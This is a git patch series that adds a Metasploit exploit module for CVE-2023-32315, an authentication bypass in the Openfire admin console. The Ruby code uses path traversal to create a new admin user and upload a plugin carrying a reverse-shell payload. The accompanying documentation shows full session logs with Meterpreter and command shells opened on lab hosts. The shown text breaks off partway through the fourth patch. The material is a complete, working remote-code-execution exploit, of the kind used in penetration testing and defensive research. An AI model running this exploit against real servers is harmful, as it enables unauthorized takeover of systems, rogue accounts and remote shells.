From 8edbf73b6f751e3692d727f4747c2e7b2597a0a6 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sat, 8 Jul 2023 09:48:17 +0000 Subject: [PATCH 1/7] first release exploit module --- data/exploits/CVE-2023-32315/changelog.html | 69 +++++ .../CVE-2023-32315/lib/plugin-metasploit.jar | Bin 0 -> 1813 bytes data/exploits/CVE-2023-32315/logo_large.gif | Bin 0 -> 1545 bytes data/exploits/CVE-2023-32315/logo_small.gif | Bin 0 -> 1021 bytes data/exploits/CVE-2023-32315/plugin.xml | 10 + data/exploits/CVE-2023-32315/readme.html | 69 +++++ ...openfire_auth_bypass_rce_cve_2023_32315.rb | 275 ++++++++++++++++++ 7 files changed, 423 insertions(+) create mode 100755 data/exploits/CVE-2023-32315/changelog.html create mode 100755 data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar create mode 100755 data/exploits/CVE-2023-32315/logo_large.gif create mode 100755 data/exploits/CVE-2023-32315/logo_small.gif create mode 100755 data/exploits/CVE-2023-32315/plugin.xml create mode 100755 data/exploits/CVE-2023-32315/readme.html create mode 100644 modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb diff --git a/data/exploits/CVE-2023-32315/changelog.html b/data/exploits/CVE-2023-32315/changelog.html new file mode 100755 index 0000000000..a7d5a78f98 --- /dev/null +++ b/data/exploits/CVE-2023-32315/changelog.html @@ -0,0 +1,69 @@ + + + + + Example plugin changelog + + + + +

+Example plugin +

+ +

Todo

+ +

+Add changelog content here +

+ + diff --git a/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar b/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar new file mode 100755 index 0000000000000000000000000000000000000000..5c3b0bec461580702d6d72e244e139e37435fb7d GIT binary patch literal 1813 zcmWIWW@h1H0D(OlZaRP&P=b?zg~8V~#8KDN&rSc|DF%iBpi&VA4j|l(rc?x|1+LWB z(a+P(H8@1i*X^_KnbSVrx_TFRy>+$DojJcb$l!|cgQrDjoP`Q?Jbcc1gfet7s-FGg zQ?YYScaX4mP;kjyt+gUOJYRT9CiC!$nlyQT7O63w-2JIryW2acxLefb^Q5mPl{+hT z0$sz-!7gx_D+XwH8W4kAhutGAK-uK{Tz%Xsc%Uj$D-v@Ha#HcA6h%{+Uyz!YmRW>P ziwrI;1v#bZnR#H#Ai;_r1DXVMx7kD4B z^SoTDGBcuX&%U^ICbO1aEnO7;`s|}u&lEI6U-LZf?~*?H%&TyiRH)8Lx8lQ`hiTqrHXrAdS1tUI;$KqEq`D{WMm~G&dYcE5=W@F>!aglXt9YeS z_x`g%l7z6A=TQSCkL*Rdk7g+eipm@KWN&8VZ?-@3I`wh&A4&Z;r}#Y2y|}|&x!pH6 zYLPhmB&}ulH(gz8d$G$u@M{F?-EWz%6uMm76|X+r)qM3~>^-q3C*F3oXG-Nu}ncgbfe zo87n0SR8FS`z&v^(e&D1dTZBLX#TdpHUHlFX*(y&D%qd$sPlNpxoqR=CwBLZR`H!X zSZc8H;K6XdWhOq^7V8t4wl!PUJXUDWmyJ1G%RYU>lLt!sq>sniT==lJP2NPr^v{Y! z%VyRoMj8v&JWOPh3p4s5VxRiKGVJ9cozuCyl>Ca0u)giro94fG#TV;nC(|viwevO| zJF=BgGk3jNJ?+BcgQc&wF}TUkGSSO^{pI4$HFsxw+%_&W>I~+5KV!zC(k-rs zc&k2X7a=_Qdnftt%h0{}5Wd?B#-q=hi)bedNUPA5B|c z)a@&*yFO##|H$jx{dS~v&geZeyVW{mZTr?vS`g)0J(i z9R1HMvEQxvx$Nv#pD+BqpO#5x%_^A1RwZX_@~-lbOxnu?y?~>_kKbJX4=!PX+m$8+ zF*7iTv4Kh$MkX!>>}3q7utWv$@(@yVGBSxUAPP_9f(ul5B7ioK3D=5Ll;X1-)#{T# z6ClMMZs&puJOp?RWP)@cia*>sK?NWJh%%z;L@Ew(8v!a15x@hN5%A&>5pVJeaip< literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2023-32315/logo_large.gif b/data/exploits/CVE-2023-32315/logo_large.gif new file mode 100755 index 0000000000000000000000000000000000000000..d1474a1a34ec07d5a4525a4279b58e403cdd6b81 GIT binary patch literal 1545 zcmV+k2KMb__vo4nTAO zMR5Q{cMd{t07i2FMScKAcmYRw6GC>T$B-5ixgLp09}NR!BKkE%+T#$}VTcao@On7w(Fs%n_G zdzP(onzVhGu6LWSSESN-pt_BuwQZ};Xsp$hsI+si)RL;Zfv(Pqt;3nDxQDdWjl0{4 zz~8OG&A7nGs>a>5#mlY9;J3=x!OGIb%FV*l*~-(~zSii~+T6$A@yp-q*WKUD;O))g z?%Uwv;Nsuiy*5~ct<>%<*;^yP%gVF?^W*IF z@9OC4?CIz2@9^vC=kNIQ?dy_{Qv*|A^8LW3IP8AEC2ui03ZM$000R70RIUbNU)&6g9sBUTxhVyjvYaQ7%@`g zLkJ2K96Xr7@PrE&H6%8Pazu-hEm2CWSRn!gMhY4xARth1go=+baQrB;Ws8_EK)1jc z+Tz6umkt~-P{828KpHM~L<$9}6sR+0_WT)yXwQ@>ONQ8ZA;piLIdgO)^i$4r_Up0Kq`mu{ae0S^Wm$*~2U+{fQuT{@-86eLJ|%;b8PjvP5} z^=K8qFpvn5FODBSMz#vpD^#LBJ(K6Twmn-3J`6l^L``bda;@=_#i|yz&b2+)v!$TJ zKq_1Ir~|H=-mhZpkdr%CyB@9v90vZ1$%1IQ+-}o=>k~JQTsU#@mTgo1y~MyXU<#S{ zH*G^OevjefO*rJlvkfUGc%z&y5|A(u9c?7C-!)!vFv>l02}sU7#w=if9<|N0%LOYu z*ajo(Jf_VejF{1dGX4lyjU*5(am6MCZa88J55|GwW7#-@$t8Hq5+ga$2*Cv#Uu+WM zh%fY*NQ!c0(+DPe9ZWjunTQueDbN{YObO(bnmhswm(m0RW|JZ6QbCDl zlF~#qSQA9>2D1?Xmtb)R v6!_dwL=#m+K?omoFo4nreFV}86JX!~TT~~+0t+A@z(ChNdjJ5{0RaFzn2Vpj literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2023-32315/logo_small.gif b/data/exploits/CVE-2023-32315/logo_small.gif new file mode 100755 index 0000000000000000000000000000000000000000..e1816427d7f0f06678304148b345f4bd4821c1be GIT binary patch literal 1021 zcmZ?wbhEHb6krfwc;3svpc%@dJf39?-ff&-b)4P}oIW+2zO|gbON~zx^$yh}^|psBQJ(#aj<=K6GZmiANicURrVd&cV}{ z4xYJk_R5Xxx9{D#d++Z32M-=Tc=+()qsNaQKLLT;FF!wc{proiXD?s9diUzZyVoz@ zy?*uS-Rn0WK7af4_S5%YzyJLG0|bBn{`vdw?>`XuKMH6Q0*XIb7`Yh!Gw3h?0Vq!} zaNJ_}&ne@v;lTkuCBFp`2b~VFu=DT;dWhlPhxQA4$x@1kKDTqu zv?=1_&{6u*Gg-U$UBHcvY}w3>E@Gxe#;M-Q*3L~U4(@VL;B(GiUXb}jz2lBet^h|1 zWBS@DT8SGZUN)*-n9jwN{^CXOGfxo>hngK8ho3PzO6sps2wddi+Qsk7CGqFFQX8+d blu1m(hA4#&0c9bL6|onb8m=-jGFSru_waN@ literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2023-32315/plugin.xml b/data/exploits/CVE-2023-32315/plugin.xml new file mode 100755 index 0000000000..7769df7049 --- /dev/null +++ b/data/exploits/CVE-2023-32315/plugin.xml @@ -0,0 +1,10 @@ + + + com.example.openfire.plugin.Example + PLUGINNAME + PLUGINDESCRIPTION + PLUGINAUTHOR + 1.0.0 + 7/7/2008 + 3.5.0 + diff --git a/data/exploits/CVE-2023-32315/readme.html b/data/exploits/CVE-2023-32315/readme.html new file mode 100755 index 0000000000..8d1da45937 --- /dev/null +++ b/data/exploits/CVE-2023-32315/readme.html @@ -0,0 +1,69 @@ + + + + + Example plugin readme + + + + +

+Example plugin +

+ +

Todo

+ +

+Add readme content here +

+ + diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb new file mode 100644 index 0000000000..dfe2154527 --- /dev/null +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -0,0 +1,275 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/zip' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Openfire authentication bypass with RCE plugin', + 'Description' => %q{ + Openfire is an XMPP server licensed under the Open Source Apache License. + Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack + via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment + in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for + administrative users. + This module will use the vulnerability to create a new admin user that will be used to upload a Openfire management plugin + weaponised with java native payload that triggers an RCE. + This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. + The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the + first version on the 4.8 branch, which is version 4.8.0. + }, + 'Author' => [ + 'h00die-gr3y ' # Metasploit module + ], + 'References' => [ + ['CVE', '2023-32315'], + ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-32315'], + ['URL', 'https://github.com/miko550/CVE-2023-32315'], + ['URL', 'https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm'] + ], + 'License' => MSF_LICENSE, + 'Platform' => [ 'java' ], + 'Privileged' => false, + 'Arch' => [ ARCH_JAVA ], + 'Targets' => [ + [ + 'Java Universal', + { + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'DefaultOptions' => { + 'PAYLOAD' => 'java/shell/reverse_tcp' + } + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-05-26', + 'DefaultOptions' => { + 'SSL' => false, + 'RPORT' => 9090 + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), + OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]), + OptString.new('PLUGINAUTHOR', [ false, 'Openfire plugin author, (default: random)' ]), + OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]), + OptString.new('ADMINNAME', [ false, 'Openfire admin user name, (default: random)' ]), + ] + ) + end + + def get_version + # get Openfire version number from the admin console login page + openfire = {} + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login.jsp'), + 'ctype' => 'application/x-www-form-urlencoded' + }) + if res && res.code == 200 + version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/) + openfire['version'] = version[0].split(':')[1].strip unless version.nil? + end + return openfire + end + + def auth_bypass + # bypass authentication using path traversal vulnerability and return true if cookie_jar is filled (JSESSION-ID and CSRF) else return false. + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-groups.jsp'), + 'ctype' => 'application/x-www-form-urlencoded', + 'keep_cookies' => true + }) + if cookie_jar.cookies.empty? + return false + else + cookie_jar.cookies.each do |cookie| + print_status(cookie.to_s) + end + return true + end + end + + def add_admin_user + # add an admin user using path traversal vulnerability using the cookies retrieved from authentication bypass. + # returns admin login hash with random generated username and password + @admin_login = {} + username = datastore['ADMINNAME'] || Rex::Text.rand_text_alpha_lower(8..15) + password = Rex::Text.rand_password(8..10) + cookie_jar.cookies.each do |cookie| + @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil? + end + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-create.jsp'), + 'ctype' => 'application/x-www-form-urlencoded', + 'keep_cookies' => true, + 'vars_get' => { + 'csrf' => @csrf_token.to_s, + 'username' => username.to_s, + 'password' => password.to_s, + 'passwordConfirm' => password.to_s, + 'isadmin' => 'on', + 'create' => '\xe5\x88\x9b\xe5\xbb\xba\xe7\x94\xa8\xe6\x88\xb7' + } + }) + # path traversal throws a java exception error 500 and/or returns a 200 OK code despite if the user is added or not + # we have to check during the login of the new admin user if we have been successful here + if res && res.code == 200 || res.code == 500 + @admin_login['username'] = username + @admin_login['password'] = password + end + return @admin_login + end + + def login_admin_user + # login using admin hash with admin username and password + # returns true if login successful else returns false + cookie_jar.cookies.each do |cookie| + @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil? + end + + res = send_request_cgi!({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login.jsp'), + 'ctype' => 'application/x-www-form-urlencoded', + 'keep_cookies' => true, + 'vars_post' => { + 'url' => '%2Findex.jsp', + 'login' => 'true', + 'csrf' => @csrf_token.to_s, + 'username' => @admin_login['username'].to_s, + 'password' => @admin_login['password'].to_s + } + }) + if res && res.code == 200 && res.body.match(/login box/).nil? + return true + else + return false + end + end + + def prepare_plugin_jar + # prepares the plugin foundation that will host the payload + files = [ + [ 'logo_large.gif' ], + [ 'logo_small.gif' ], + [ 'readme.html' ], + [ 'changelog.html' ], + [ 'lib', 'plugin-metasploit.jar' ] + ] + + jar = Rex::Zip::Jar.new + jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315')) + + @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15) + plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15) + plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15) + + plugin_xml = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'), 'rb', &:read) + plugin_xml.gsub!(/PLUGINNAME/, @plugin_name) + plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) + plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) + + jar.add_file('plugin.xml', plugin_xml) + return jar + end + + def upload_and_execute_plugin(plugin_jar) + # upload and execute Openfire plugin with encoded payload + # returns true if upload is successful else returns false + + # construct multipart form data + form_data = Rex::MIME::Message.new + form_data.add_part(plugin_jar.to_s, 'application/x-java-archive', 'binary', "form-data; name=\"uploadfile\"; filename=\"#{@plugin_name}.jar\"") + + # extract the csrf token + cookie_jar.cookies.each do |cookie| + @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil? + end + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'plugin-admin.jsp'), + 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", + 'keep_cookies' => true, + 'data' => form_data.to_s, + 'vars_get' => { + 'uploadplugin' => nil, + 'csrf' => @csrf_token.to_s + } + }) + # with a successfull upload and execution of the plugin, no response is returned. + return true unless res + # safety check if, for whatever reason, we get a 302 response back + if res.code == 302 && res.headers.to_s.match(/uploadsuccess=true/) + return true + else + return false + end + end + + def check + openfire = get_version + return CheckCode::Safe if openfire.empty? + # check first for patched versions + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') || Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') + + if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') + CheckCode::Vulnerable("Openfire version is #{openfire['version']}") + else + CheckCode::Safe("Openfire version is #{openfire['version']}") + end + end + + def exploit + # gain access exploiting path traversal vulnerability + print_status('Grabbing the cookies.') + fail_with(Failure::NoAccess, 'Authentication bypass is not successful.') unless auth_bypass + + # add a new admin user + print_status('Adding a new admin user.') + fail_with(Failure::NoAccess, 'Adding a new admin user is not successful.') if add_admin_user.empty? + + # login with new admin account + print_status("Logging in with admin user \"#{@admin_login['username']}\" and password \"#{@admin_login['password']}\".") + fail_with(Failure::NoAccess, 'Login is not successful.') unless login_admin_user + + # prepare Openfire plugin with payload + plugin = prepare_plugin_jar + plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) + plugin.build_manifest + + # upload and execute Openfire plugin with payload + print_status("Upload and execute plugin \"#{@plugin_name}\" with payload \"#{datastore['PAYLOAD']}\".") + fail_with(Failure::PayloadFailed, 'Upload and/or execution of the plugin is not successful.') unless upload_and_execute_plugin(plugin.pack) + + # cover our tracks!!! + # remove plugin and newly added admin user + # Automatic removal of plugin and admin user might cause instability in the application, + # so remove it manually in Openfire Management console after the exploit is completed. + print_warning("Plugin \"#{@plugin_name}\" need manually clean-up via Openfire Admin console.") + print_warning("Admin user \"#{@admin_login['username']}\" need manually clean-up via Openfire Admin console.") + end +end From a3ea55f2a6b23dded0055bfbe8bdbd92e2c3b90a Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sat, 8 Jul 2023 12:30:54 +0000 Subject: [PATCH 2/7] added documentation --- ...openfire_auth_bypass_rce_cve_2023_32315.md | 190 ++++++++++++++++++ 1 file changed, 190 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md diff --git a/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md b/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md new file mode 100644 index 0000000000..943856b49c --- /dev/null +++ b/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md @@ -0,0 +1,190 @@ +## Vulnerable Application +`Openfire's` administrative console, a web-based application, was found to be vulnerable to a path traversal attack +via the setup environment using the path `http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/`. +Endpoints such as `log.jsp`, `user-groups.jsp` and `user-create.jsp` can be used to gain unauthorized admin access. +It allows an unauthenticated user to use the unauthenticated `Openfire` Setup Environment in an already configured +`Openfire` environment to access restricted pages in the `Openfire Admin Console` reserved for administrative users. + +This module will use the vulnerability to create a new admin user that will be used to upload a `Openfire` management plugin +weaponized with a `Java` native payload that triggers an RCE. +The vulnerability affects all versions of `Openfire` that have been released since April 2015, starting with version `3.10.0`. +The problem has been patched in `Openfire` release `4.7.5` and `4.6.8`, and further improvements will be included +in the first version on the `4.8` branch, which is version `4.8.0`. + +This module has been tested on: +- [ ] Ubuntu Linux 22.04. +* Openfire 3.10.1, 4.0.4, 4.1.0, 4.2.0, 4.3.0, 4.4.0, 4.5.0, 4.6.0. 4.7.0, 4.7.1, 4.7.3 +* Java 7, 8, 17 +- [ ] Windows Server 2019 Datacenter +* Openfire 4.7.3 +* Java 20 + +**Instructions for an Openfire installation:** +Download Openfire releases [here](https://github.com/igniterealtime/Openfire/releases?page=1) +Follow installation instructions [here](https://download.igniterealtime.org/openfire/docs/latest/documentation/install-guide.html) + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315` +- [ ] `set rhosts ` +- [ ] `set rport ` +- [ ] `set target <0=Java Universal>` +- [ ] `exploit` +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings + +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > options + +Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + ADMINNAME no Openfire admin user name, (default: random) + PLUGINAUTHOR no Openfire plugin author, (default: random) + PLUGINDESC no Openfire plugin description, (default: random) + PLUGINNAME no Openfire plugin base name, (default: random) + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 9090 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The base path to the web application + VHOST no HTTP server virtual host + + +Payload options (java/shell/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Java Universal +``` + +## Options + +### TARGETURI +The uripath to the `Openfire Admin Console`. Default set to `/` which is the standard for `Openfire`. + +### ADMINNAME +`Openfire` admin user name option to create a new admin user. User name will be randomized if not set. + +### PLUGINAUTHOR +`Openfire` plugin author to set the name of the plugin author. Author name will be randomized if not set. + +### PLUGINDESC +`Openfire` plugin description to update the description of the plugin. Description will be randomized if not set. + +### PLUGINNAME +`Openfire` plugin name to set the plugin name. Plugin name will be randomized if not set. + +## Scenarios +### Ubuntu 22.04 - Openfire 4.7.0 - java/meterpreter/reverse_tcp +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit + +[*] Started reverse TCP handler on 192.168.201.10:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Openfire version is 4.7.0 +[*] Grabbing the cookies. +[*] JSESSIONID=node010hllcuuhb19x13etracg8jjxk24.node0 +[*] csrf=Lc9ZXFTo6H3bnC1 +[*] Adding a new admin user. +[*] Logging in with admin user "jdajefap" and password "W3EozCK8Nx". +[*] Upload and execute plugin "U6zVD3dY" with payload "java/meterpreter/reverse_tcp". +[*] Sending stage (58851 bytes) to 192.168.201.59 +[*] Meterpreter session 33 opened (192.168.201.10:4444 -> 192.168.201.59:60420) at 2023-07-08 10:33:16 +0000 +[!] Plugin "U6zVD3dY" need manually clean-up via Openfire Admin console. +[!] Admin user "jdajefap" need manually clean-up via Openfire Admin console. + +meterpreter > getuid +Server username: openfire +meterpreter > sysinfo +Computer : cuckoo +OS : Linux 5.15.0-76-generic (amd64) +Architecture : x64 +System Language : en_US +Meterpreter : java/linux +meterpreter > +``` +### Windows Server 2019 Datacenter - Openfire 4.7.3 - java/shell/reverse_tcp +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit + +[*] Started reverse TCP handler on 192.168.201.10:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Openfire version is 4.7.4 +[*] Grabbing the cookies. +[*] JSESSIONID=node01dr68xhv8giop14zogvh0ycnt13.node0 +[*] csrf=mRz62R9hab6YAgt +[*] Adding a new admin user. +[*] Logging in with admin user "qkcvdmmevuvw" and password "tO0gWgDrM4". +[*] Upload and execute plugin "XZl3TKb1ayogynR" with payload "java/shell/reverse_tcp". +[*] Sending stage (2952 bytes) to 192.168.201.57 +[!] Plugin "XZl3TKb1ayogynR" need manually clean-up via Openfire Admin console. +[!] Admin user "qkcvdmmevuvw" need manually clean-up via Openfire Admin console. +[*] Command shell session 32 opened (192.168.201.10:4444 -> 192.168.201.57:50171) at 2023-07-08 10:31:01 +0000 + + +Shell Banner: +Microsoft Windows [Version 10.0.17763.107] +----- + + +C:\Program Files\Openfire\bin>systeminfo +systeminfo + +Host Name: WIN-HHRQENPDSRS +OS Name: Microsoft Windows Server 2019 Datacenter +OS Version: 10.0.17763 N/A Build 17763 +OS Manufacturer: Microsoft Corporation +OS Configuration: Standalone Server +OS Build Type: Multiprocessor Free +Registered Owner: Windows User +Registered Organization: +Product ID: 00430-00000-00000-AA500 +Original Install Date: 1/23/2023, 4:51:06 AM +System Boot Time: 7/8/2023, 2:16:23 AM +System Manufacturer: innotek GmbH +System Model: VirtualBox +System Type: x64-based PC +Processor(s): 1 Processor(s) Installed. + [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2306 Mhz +BIOS Version: innotek GmbH VirtualBox, 12/1/2006 +Windows Directory: C:\Windows +System Directory: C:\Windows\system32 +Boot Device: \Device\HarddiskVolume1 +System Locale: en-us;English (United States) +Input Locale: en-us;English (United States) +Time Zone: (UTC-08:00) Pacific Time (US & Canada) +Total Physical Memory: 2,048 MB +Available Physical Memory: 728 MB +Virtual Memory: Max Size: 3,469 MB +Virtual Memory: Available: 1,523 MB +Virtual Memory: In Use: 1,946 MB +Page File Location(s): C:\pagefile.sys +Domain: WORKGROUP +Logon Server: N/A +Hotfix(s): 1 Hotfix(s) Installed. + [01]: KB4464455 +Network Card(s): 1 NIC(s) Installed. + [01]: Intel(R) PRO/1000 MT Desktop Adapter + Connection Name: Ethernet + DHCP Enabled: Yes + DHCP Server: 192.168.201.1 + IP address(es) + [01]: 192.168.201.57 + [02]: fe80::b089:6587:7273:231e +Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. + +C:\Program Files\Openfire\bin> +``` + +## Limitations +No limitations. From c34779a5f156a7f03892626ea35ed338dbeced51 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sun, 9 Jul 2023 12:20:58 +0000 Subject: [PATCH 3/7] updates based on comments of jvoisin and adfoster-r7 --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index dfe2154527..d0e72f336e 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2023-32315'], - ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-32315'], + ['URL', 'https://attackerkb.com/topics/7Tf5YGY3oT/cve-2023-32315'], ['URL', 'https://github.com/miko550/CVE-2023-32315'], ['URL', 'https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm'] ], @@ -100,14 +100,12 @@ class MetasploitModule < Msf::Exploit::Remote 'ctype' => 'application/x-www-form-urlencoded', 'keep_cookies' => true }) - if cookie_jar.cookies.empty? - return false - else - cookie_jar.cookies.each do |cookie| - print_status(cookie.to_s) - end - return true + return false if cookie_jar.cookies.empty? + + cookie_jar.cookies.each do |cookie| + print_status(cookie.to_s) end + return true end def add_admin_user @@ -131,11 +129,11 @@ class MetasploitModule < Msf::Exploit::Remote 'password' => password.to_s, 'passwordConfirm' => password.to_s, 'isadmin' => 'on', - 'create' => '\xe5\x88\x9b\xe5\xbb\xba\xe7\x94\xa8\xe6\x88\xb7' + 'create' => 'Create+User' } }) - # path traversal throws a java exception error 500 and/or returns a 200 OK code despite if the user is added or not - # we have to check during the login of the new admin user if we have been successful here + # path traversal throws a java exception error 500 and/or returns a 200 OK code not matter if the user is added or not, + # so we have to check during the login of the new admin user if we have been successful here if res && res.code == 200 || res.code == 500 @admin_login['username'] = username @admin_login['password'] = password @@ -187,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15) - plugin_xml = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'), 'rb', &:read) + plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml')) plugin_xml.gsub!(/PLUGINNAME/, @plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) @@ -234,7 +232,9 @@ class MetasploitModule < Msf::Exploit::Remote openfire = get_version return CheckCode::Safe if openfire.empty? # check first for patched versions - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') || Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') CheckCode::Vulnerable("Openfire version is #{openfire['version']}") From b15d595de2b44aa2bcb28e70ace9773eb47e99cd Mon Sep 17 00:00:00 2001 From: bwatters Date: Fri, 14 Jul 2023 12:47:04 -0500 Subject: [PATCH 4/7] Adjust files to be better shared --- .../changelog.html | 0 .../lib/plugin-metasploit.jar | Bin .../logo_large.gif | Bin .../logo_small.gif | Bin .../{CVE-2023-32315 => openfire_plugin}/plugin.xml | 0 .../{CVE-2023-32315 => openfire_plugin}/readme.html | 0 .../{CVE-2008-6508 => openfire_plugin}/Example.java | 0 modules/exploits/multi/http/openfire_auth_bypass.rb | 4 ++-- .../http/openfire_auth_bypass_rce_cve_2023_32315.rb | 4 ++-- 9 files changed, 4 insertions(+), 4 deletions(-) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/changelog.html (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/lib/plugin-metasploit.jar (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/logo_large.gif (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/logo_small.gif (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/plugin.xml (100%) rename data/exploits/{CVE-2023-32315 => openfire_plugin}/readme.html (100%) rename 